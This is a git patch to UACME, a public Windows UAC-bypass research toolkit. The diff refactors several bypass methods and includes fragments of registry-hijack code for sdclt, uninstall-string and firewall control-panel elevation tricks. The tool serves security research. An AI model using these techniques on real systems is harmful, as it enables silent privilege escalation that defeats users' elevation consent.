From d033e6cd41b0b8b267468fa8f5a1f17094b37cd3 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Sun, 5 Aug 2018 12:26:27 +0700 Subject: [PATCH] v 2.9.0 Internal rearrange. Marking 42 as unfixed again as it produces mixed results on different Windows 10 builds. --- README.md | 4 ++-- Source/Akagi/Resource.rc | Bin 6144 -> 6144 bytes Source/Akagi/consts.h | 4 ++++ Source/Akagi/methods/comet.c | 6 +++--- Source/Akagi/methods/enigma0x3.c | 27 ++++++++++++------------ Source/Akagi/methods/explife.c | 8 +++---- Source/Akagi/methods/methods.c | 35 ++++++++++++++++++++++++------- Source/Akagi/methods/methods.h | 2 +- Source/Akagi/uacme.vcxproj.user | 12 +++++------ UACME.sha256 | 16 +++++++------- 10 files changed, 70 insertions(+), 44 deletions(-) diff --git a/README.md b/README.md index 383150c..77f745a 100644 --- a/README.md +++ b/README.md @@ -393,8 +393,8 @@ Keys (watch debug output with dbgview or similar for more info): * Component(s): Attacker defined * Implementation: ucmFwCplLuaMethod * Works from: Windows 7 (7600) - * Fixed in: Windows 10 RS4 (17134) - * How: Shell API update + * Fixed in: unfixed :see_no_evil: + * How: - 43. Author: Oddvar Moe derivative * Type: Elevated COM interface * Method: IColorDataProxy, ICMLuaUtil diff --git a/Source/Akagi/Resource.rc b/Source/Akagi/Resource.rc index c1771907857575d0e54f201d1d9af73fbdf6d834..e054504b6ea78521f17fa3f44a3226b0f77ccc8b 100644 GIT binary patch delta 38 rcmZoLXfW6y!pCSaS(MM5(PFbN-&-aiXQH6)<_y6bj6e}b;r%QC)Kd#G delta 38 rcmZoLXfW6y!pCSnS(MM5(R{Nn-&-aiXQH6)<_y6bj6e}b;r%QC)CLPK diff --git a/Source/Akagi/consts.h b/Source/Akagi/consts.h index 18de97a..28c2778 100644 --- a/Source/Akagi/consts.h +++ b/Source/Akagi/consts.h @@ -34,6 +34,8 @@ #define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\" #define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration" #define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls" +#define T_UNINSTALL L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\" + #define T_MSC_SHELL L"Software\\Classes\\mscfile" #define T_EXEFILE_SHELL L"Software\\Classes\\exefile" #define T_MSSETTINGS L"Software\\Classes\\ms-settings" @@ -52,6 +54,8 @@ #define T_ISOLATEDCOMMAND L"IsolatedCommand" #define T_DELEGATEEXECUTE L"DelegateExecute" +#define T_UNINSTALL_STRING L"UninstallString" + #define BINARYPATH_TAG L"binarypatch01" #define MSFT_FULL L"Microsoft Corporation" diff --git a/Source/Akagi/methods/comet.c b/Source/Akagi/methods/comet.c index 13f9aa3..2e9ec3e 100644 --- a/Source/Akagi/methods/comet.c +++ b/Source/Akagi/methods/comet.c @@ -4,9 +4,9 @@ * * TITLE: COMET.C * -* VERSION: 2.87 +* VERSION: 2.90 * -* DATE: 19 Jan 2018 +* DATE: 16 July 2018 * * Comet method (c) BreakingMalware * For description please visit original URL @@ -123,7 +123,7 @@ BOOL ucmCometMethod( persistFile->lpVtbl->Release(persistFile); _strcpy(szCombinedPath, g_ctx.szTempDirectory); - _strcat(szCombinedPath, L"huy32"); + _strcat(szCombinedPath, SOMEOTHERNAME); _strcpy(szLinkFile, szCombinedPath); _strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET); diff --git a/Source/Akagi/methods/enigma0x3.c b/Source/Akagi/methods/enigma0x3.c index 32d7bd8..9c4846f 100644 --- a/Source/Akagi/methods/enigma0x3.c +++ b/Source/Akagi/methods/enigma0x3.c @@ -4,9 +4,9 @@ * * TITLE: ENIGMA0X3.C * -* VERSION: 2.89 +* VERSION: 2.90 * -* DATE: 14 Jun 2018 +* DATE: 16 July 2018 * * Enigma0x3 autoelevation methods and everything based on the same * ShellExecute related registry manipulations idea. @@ -478,22 +478,23 @@ BOOL ucmSdcltIsolatedCommandMethod( // There is a fix of original concept in 16237 RS3. // Bypass it. // - if (g_ctx.dwBuildNumber >= 16237) + if (g_ctx.dwBuildNumber >= 16237) { lpTargetValue = TEXT(""); + } else { lpTargetValue = T_ISOLATEDCOMMAND; - - // - // Save old value if exist. - // - cbOldData = MAX_PATH * 2; - RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue)); - lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL, - (BYTE*)szOldValue, &cbOldData); - if (lResult == ERROR_SUCCESS) - bExist = TRUE; } + // + // Save old value if exist. + // + cbOldData = MAX_PATH * 2; + RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue)); + lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL, + (BYTE*)szOldValue, &cbOldData); + if (lResult == ERROR_SUCCESS) + bExist = TRUE; + cbData = (DWORD)((1 + sz) * sizeof(WCHAR)); lResult = RegSetValueEx( diff --git a/Source/Akagi/methods/explife.c b/Source/Akagi/methods/explife.c index a6692e5..d29110b 100644 --- a/Source/Akagi/methods/explife.c +++ b/Source/Akagi/methods/explife.c @@ -4,9 +4,9 @@ * * TITLE: EXPLIFE.C * -* VERSION: 2.87 +* VERSION: 2.90 * -* DATE: 19 Jan 2018 +* DATE: 19 July 2018 * * ExpLife UAC bypass using IARPUninstallStringLauncher. * For description please visit original URL @@ -104,7 +104,7 @@ BOOL ucmUninstallLauncherMethod( if (CoCreateGuid(&guid) != S_OK) break; - _strcpy(szKeyName, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\")); + _strcpy(szKeyName, T_UNINSTALL); if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) { _strcat(szKeyName, szGuid); @@ -115,7 +115,7 @@ BOOL ucmUninstallLauncherMethod( break; cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR); - lResult = RegSetValueEx(hKey, TEXT("UninstallString"), 0, REG_SZ, (BYTE*)lpszExecutable, + lResult = RegSetValueEx(hKey, T_UNINSTALL_STRING, 0, REG_SZ, (BYTE*)lpszExecutable, (DWORD)cbData); if (lResult != ERROR_SUCCESS) diff --git a/Source/Akagi/methods/methods.c b/Source/Akagi/methods/methods.c index 867ab17..62de12b 100644 --- a/Source/Akagi/methods/methods.c +++ b/Source/Akagi/methods/methods.c @@ -6,7 +6,7 @@ * * VERSION: 2.90 * -* DATE: 10 July 2018 +* DATE: 01 Aug 2018 * * UAC bypass dispatch. * @@ -68,7 +68,7 @@ UCM_API(MethodSPPLUAObject); ULONG CALLBACK IsMethodNeedRemediation( PVOID Parameter); -UCM_EXTRA_CONTEXT g_ucmWDCallback = { IsMethodNeedRemediation, NULL }; +UCM_EXTRA_CONTEXT g_ucmWDCallback; UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, @@ -113,7 +113,7 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, - { MethodFwCplLua, &g_ucmWDCallback, { 7600, 17134 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, + { MethodFwCplLua, &g_ucmWDCallback, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }, { MethodVolatileEnv, NULL, { 7600, 16229 }, FUBUKI_ID, FALSE, TRUE, TRUE }, { MethodSluiHijack, &g_ucmWDCallback, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE }, @@ -122,6 +122,26 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = { { MethodSPPLUAObject, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE } }; +/* +* SetupExtraContextCalbacks +* +* Purpose: +* +* Configure extra context callbacks. +* +*/ +VOID SetupExtraContextCalbacks( + VOID +) +{ + g_ucmWDCallback.Parameter = (PVOID)g_ctx.IsWow64; + g_ucmWDCallback.Routine = IsMethodNeedRemediation; + + // + // Reserved for future use. + // +} + /* * IsMethodNeedRemediation * @@ -266,6 +286,8 @@ BOOL MethodsManagerCall( } } + SetupExtraContextCalbacks(); + bResult = Entry->Routine(Method, Entry->ExtraContext, PayloadCode, PayloadSize); if (PayloadCode) { @@ -938,7 +960,7 @@ UCM_API(MethodFwCplLua) if (g_ctx.dwBuildNumber >= 9600) { if (ExtraContext) { if (ExtraContext->Routine) { - if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS) + if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS) g_ctx.MethodExecuteType = ucmExTypeRemediationRequired; } } @@ -993,14 +1015,13 @@ UCM_API(MethodSluiHijack) LPWSTR lpszPayload = NULL; UNREFERENCED_PARAMETER(Method); - UNREFERENCED_PARAMETER(ExtraContext); UNREFERENCED_PARAMETER(PayloadCode); UNREFERENCED_PARAMETER(PayloadSize); if (g_ctx.dwBuildNumber >= 9600) { if (ExtraContext) { if (ExtraContext->Routine) { - if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS) + if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS) g_ctx.MethodExecuteType = ucmExTypeRemediationRequired; } } @@ -1063,4 +1084,4 @@ UCM_API(MethodSPPLUAObject) return ucmSPPLUAObjectMethod(PayloadCode, PayloadSize); } -#pragma warning(pop) \ No newline at end of file +#pragma warning(pop) diff --git a/Source/Akagi/methods/methods.h b/Source/Akagi/methods/methods.h index 2dd01b0..0f5f1b4 100644 --- a/Source/Akagi/methods/methods.h +++ b/Source/Akagi/methods/methods.h @@ -6,7 +6,7 @@ * * VERSION: 2.90 * -* DATE: 10 July 2018 +* DATE: 01 Aug 2018 * * Prototypes and definitions for UAC bypass methods table. * diff --git a/Source/Akagi/uacme.vcxproj.user b/Source/Akagi/uacme.vcxproj.user index 9bd6ef8..4008859 100644 --- a/Source/Akagi/uacme.vcxproj.user +++ b/Source/Akagi/uacme.vcxproj.user @@ -1,27 +1,27 @@  - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger - 0 + 42 WindowsLocalDebugger \ No newline at end of file diff --git a/UACME.sha256 b/UACME.sha256 index f68ed70..ccd9f28 100644 --- a/UACME.sha256 +++ b/UACME.sha256 @@ -12,20 +12,20 @@ a0a07303b0cf4591542c18436aa579d0ed91f880fcdf01e2796b5bf03dc311d0 *Source\Akagi\b 5eafc42613cbf70c4ee53f0511befc8a0ddd212f83387877a9883d05036f493c *Source\Akagi\bin64res.rc c401577184f2f57d56fea4c03e0cc1c18a7785bf8b251ca658ade5685a9848c3 *Source\Akagi\compress.c 9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h -f98bea095c00078ae9be90e276ff36cceeaecd8f3c3bc79a8ba0db3e72d92aeb *Source\Akagi\consts.h +2941a15a2787f4e2d5fafa8cde6db6d898135951df5bbe1059ff3cf87f4e18d3 *Source\Akagi\consts.h 44bd12f1712f8390bda2ecd6fb4e763c320239ac25e31f426bd91656647bf38d *Source\Akagi\global.h 4e740d5caffc8068a07e6ca862ed85de1de383e45cf31013c9e36efdf6a8b111 *Source\Akagi\main.c a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h -49b33e6032f42dde93e7b03efb17290eaf65c4fab95b5753fbf335722916cb52 *Source\Akagi\Resource.rc +0de1eadbf92af6616dc03fbf8a0800166f42613f0a31680f940c3aa309587ba2 *Source\Akagi\Resource.rc b002efa2d4bebd83b8fad8b6d2ec525de57919796bffa0577ab49a7a179cba7f *Source\Akagi\sup.c 3479b565d7a469087825838cd724eb58187e4df92ff86e2f65dde746fca8ec17 *Source\Akagi\sup.h a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress a7d382431eb421142fcc28156364f60e807ca4818b350a6b6b614ab6542e9074 *Source\Akagi\uacme.vcxproj 92069b7b38ee6ce5c2e8a9189c078f2ccd251fab0514d362d5f0a13e95d08aeb *Source\Akagi\uacme.vcxproj.filters -cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user +cd9b79b5e8e8a9c2a7a8afcf49d685f50368fb20ad2d4c133eb835e133ad82d5 *Source\Akagi\uacme.vcxproj.user 425b613c924b247fbd40967f4d25c432edddef1c1599cb5cb5c50f5cf0490b6e *Source\Akagi\bin\Akatsuki64.cd 1a2e3df7ad3adc7e4c381e5dc2169e759567bd5c3801b38cc50180c81aad8756 *Source\Akagi\bin\Fubuki32.cd 579e447729ba32e0d5d69146acbc048e3aaa8c9f404c0ae481f44d494ff77bae *Source\Akagi\bin\Fubuki64.cd @@ -49,15 +49,15 @@ fbab853743692f7d3fa52343e85518aa9fdc462b389c9847e5f8628efb7432d3 *Source\Akagi\m 86471743844fedc7910c20b259c55504c4f28dad9df7c8f95a67fa626727ecbf *Source\Akagi\methods\carberp.c 16253a3986916f936630970a044d62d20dcce961ed074c988013ee17669b9906 *Source\Akagi\methods\carberp.h c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h -020c20e6c225f4fde1b7df23c9d56ffe903a9f45936814984d8a72b1b7b82cc1 *Source\Akagi\methods\comet.c +ade9abba42c00fa2f7427a88ca8035180dfd62acabb1831ee68584af2486653e *Source\Akagi\methods\comet.c 7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h 5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c 7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h be2ceae57389dcaf814cd5e1fc1c137979b71671eca44a4db445fa2824591691 *Source\Akagi\methods\deroko.c 51d35d30ca8bc6a72202fa26aa6f2cb648036d62635cb52d52ee2d6bbc07da2b *Source\Akagi\methods\deroko.h -e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\methods\enigma0x3.c +ec11c2f469f7e7f76893e23d7e275f55930f80fd8a080078cfcd86532888e52a *Source\Akagi\methods\enigma0x3.c 5c791f3bcdd23a2eabad1afd7205896bc09848d4c62b1efc2c5a777b2b5aabc8 *Source\Akagi\methods\enigma0x3.h -8c6acdf8a3a6a2ca5c07cc947ed098c4d6bc8b951558c5f9670048c248748b70 *Source\Akagi\methods\explife.c +c81f288adea7caf27d98ba81d7a1350376b72ecdab01edf89b697d77dda4c02e *Source\Akagi\methods\explife.c 1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h 3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h 8430eaf9d06136a6a7e015ccefac85b29476e56024f98a36db5947f8e0fa648e *Source\Akagi\methods\gootkit.c @@ -66,8 +66,8 @@ e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\m fb16843d3353e3499d902bdbad39a82e045406f4e4a98da4cbcad2cc28d0cce3 *Source\Akagi\methods\hakril.h 6194cd6305dadcfbedbb9d68a6f48ecf029e3b2fc03c313009aed7e2cf57edf3 *Source\Akagi\methods\hybrids.c 584dbe0e06fbe88a15f358b2f9d9b5b230deb63d4b8c7469db4f6085be2064d6 *Source\Akagi\methods\hybrids.h -bcd5ff3516346a3a73ab224caf5fb8656e82086bb4759d7260af2c4555c9c4e0 *Source\Akagi\methods\methods.c -a7ddc62ad4a87b9edd8069ccf6c84bc018d6b54fa8c3f6917a9d43279219f36b *Source\Akagi\methods\methods.h +bb0f1b7465ff6c0686d4458d6c4e22f45296eae04e46c49316b5cf8b02b4512d *Source\Akagi\methods\methods.c +80f45429311e0d30b2bc714a15f17bdad5d40295b13c33271a4fc6e9c5669f15 *Source\Akagi\methods\methods.h 58f7b319b79172a6eb4c563db0a40320d4d6d68d02fb3b164c7875c413bd6184 *Source\Akagi\methods\pitou.c cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h 6fd555cf1bd17921e5b4f7aaefb4cc3dca2483159da3e24703c8412e36bb8354 *Source\Akagi\methods\sandworm.c